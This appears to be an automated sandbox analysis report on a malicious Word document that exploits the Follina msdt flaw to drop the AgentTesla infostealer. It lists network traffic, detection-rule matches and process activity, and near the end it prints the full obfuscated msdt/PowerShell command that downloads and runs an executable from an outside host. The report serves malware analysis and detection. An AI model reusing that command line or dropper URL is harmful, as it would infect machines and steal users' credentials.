Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXrN.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed

Source: unknown	HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49727 version: TLS 1.2

Source: PMoZbw.exe, 00000013.00000002.616474062.0000000001218000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

.NET source code contains very large array initializations

Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b60B8AA9Fu002dD6E9u002d485Du002d90E4u002dF4EB08C8FB98u007d/u00368DDB562u002dB705u002d46E4u002d9F6Fu002d1E7B20C2B6F8.cs

Large array initialization: .cctor: array initializer size 10987

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_05B713B8	15_2_05B713B8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_05B70C50	15_2_05B70C50
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_05B7E33F	15_2_05B7E33F
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_05B7E350	15_2_05B7E350
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766BFC0	15_2_0766BFC0
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_07666573	15_2_07666573
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766D531	15_2_0766D531
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766ADE0	15_2_0766ADE0
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_07662DF0	15_2_07662DF0
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766B428	15_2_0766B428
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766CB51	15_2_0766CB51
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766E3E8	15_2_0766E3E8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_07668120	15_2_07668120
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766BF3D	15_2_0766BF3D
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_076677A0	15_2_076677A0
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766E373	15_2_0766E373
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_07663B48	15_2_07663B48
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766E300	15_2_0766E300
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766E31E	15_2_0766E31E
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766F2E0	15_2_0766F2E0
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_0766F2D1	15_2_0766F2D1
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C353CA	15_2_08C353CA
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30CB0	15_2_08C30CB0
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C38460	15_2_08C38460
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C3BD38	15_2_08C3BD38
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C33F58	15_2_08C33F58
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C358F8	15_2_08C358F8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30880	15_2_08C30880
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30890	15_2_08C30890
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C34098	15_2_08C34098
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C38179	15_2_08C38179
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30AA9	15_2_08C30AA9
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30AB8	15_2_08C30AB8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30CAE	15_2_08C30CAE
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C34432	15_2_08C34432
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30660	15_2_08C30660
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C35E6A	15_2_08C35E6A
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C30670	15_2_08C30670
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C317C8	15_2_08C317C8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C317E0	15_2_08C317E0
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C39F90	15_2_08C39F90
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C33F48	15_2_08C33F48
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C38712	15_2_08C38712
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C38720	15_2_08C38720
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_015AFA60	17_2_015AFA60
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_015A6C60	17_2_015A6C60
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_061BC7D8	17_2_061BC7D8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_061B0040	17_2_061B0040
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_061B0910	17_2_061B0910
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_061B29F8	17_2_061B29F8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_06D39838	17_2_06D39838
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_06D3B9AD	17_2_06D3B9AD
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_06D325F8	17_2_06D325F8
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_06D3BD28	17_2_06D3BD28
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_06D3D2F0	17_2_06D3D2F0

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE

Section loaded: sfc.dll

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll 456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8

Source: document.xml.rels, type: SAMPLE	Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: Process Memory Space: msdt.exe PID: 4760, type: MEMORYSTR	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20

Source: DiagPackage.dll.mui.4.dr	Static PE information: No import functions for PE file found
Source: DiagPackage.dll.4.dr	Static PE information: No import functions for PE file found

Source: PMoZbw.exe.17.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payment copy_2911022.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Payment copy_2911022.docx.doc

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@18/35@9/3

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Payment copy_2911022.docx.doc	ReversingLabs: Detection: 41%
Source: Payment copy_2911022.docx.doc	Virustotal: Detection: 46%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline
